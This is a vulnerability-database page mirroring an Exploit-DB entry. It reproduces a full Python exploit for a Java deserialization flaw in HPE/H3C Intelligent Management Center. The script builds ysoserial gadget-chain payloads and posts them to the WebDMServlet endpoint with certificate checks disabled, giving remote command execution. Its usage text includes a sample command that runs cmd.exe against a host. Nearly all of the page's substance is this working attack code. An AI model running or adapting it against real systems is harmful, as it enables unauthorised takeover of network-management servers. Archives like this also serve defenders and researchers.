Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HPE < 7.2 - Java Deserialization

🗓️ 19 Sep 2017 00:00:00Reported by Raphael KuhnType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 96 Views

HPE Java Deserialization Exploit Tested on Windows Server 2008 R2. Send payload to server using ysoserial.ja

Code
#!/usr/bin/env python

########################################################################################################
# 
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
#    Tested on Windows Server 2008 R2
#    Name	HPE/H3C IMC (Intelligent Management Center)	Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
# 
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################

import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

host         = "127.0.0.1:8080"
payload_file = "payload.bin"
body        = ""

def printUsage () :
    print "......................................................................................................................"
    print "."
    print ". HPE/H3C - IMC Java Deserialization Exploit"
    print "."
    print ". Example 1: -payload-binary"
    print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
    print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
    print ".     1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
    print ".        java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
    print ".     2. Send request to server"
    print ".        %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin"  % sys.argv[0]
    print "."
    print ". Example 2: -payload-string"
    print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
    print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
    print ".     1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
    print '.        %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"'  % sys.argv[0]
    print "."
    print "......................................................................................................................"

def loadPayloadFile (_fileName) :
    print "[+] Load payload file %s" % _fileName
    payloadFile = open(_fileName, 'rb')
    payloadFile_read = payloadFile.read()
    return payloadFile_read

def exploit (_payload) :
    url = sys.argv[1]
    url += "/imc/topo/WebDMServlet"
    print "[+] Sending exploit to %s" % (url) 
    data = _payload
    response = requests.post(url, data=data, verify=False)
    return response

#def showResponse(_response):
#    r = response
#    m = r.search(_response)
#    if (m.find("java.lang.NullPointerException")):
#        print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
#    else:
#        print "[-] ClassCastException not found, exploit failed"


if __name__ == "__main__":
    if len(sys.argv) < 4:
        printUsage()
        sys.exit(0)
    else:
        print "------------------------------------------"
        print "- HPE/H3C - IMC Java Deserialization Exploit -"
        print "------------------------------------------"
        host = sys.argv[1]
        print "[*] Connecting to %s" %host
    if sys.argv[2] == "-payload-binary":
        payload_file = sys.argv[3]
        if os.path.isfile(payload_file):
            payload = loadPayloadFile(payload_file)
            response = exploit(payload)
            showResponse(response.content)
        else:
            print "[-] Can't load payload file"
    elif sys.argv[2] == "-payload-string":
            if os.path.isfile("ysoserial.jar"):
                sPayload = sys.argv[3]
                sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
                print "[+] Create payload file (%s) " %sPayload
                os.system(sPayload)
                payload = loadPayloadFile(payload_file)
                response = exploit(payload)
                print "[+] Response received, exploit finished."
            else:
                print "[-] Can't load ysoserial.jar"
    else:
        printUsage()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Sep 2017 00:00Current
7.4High risk
Vulners AI Score7.4
hpejava deserializationexploitwindows server 2008 r2ysoserial.jarserverpayload
96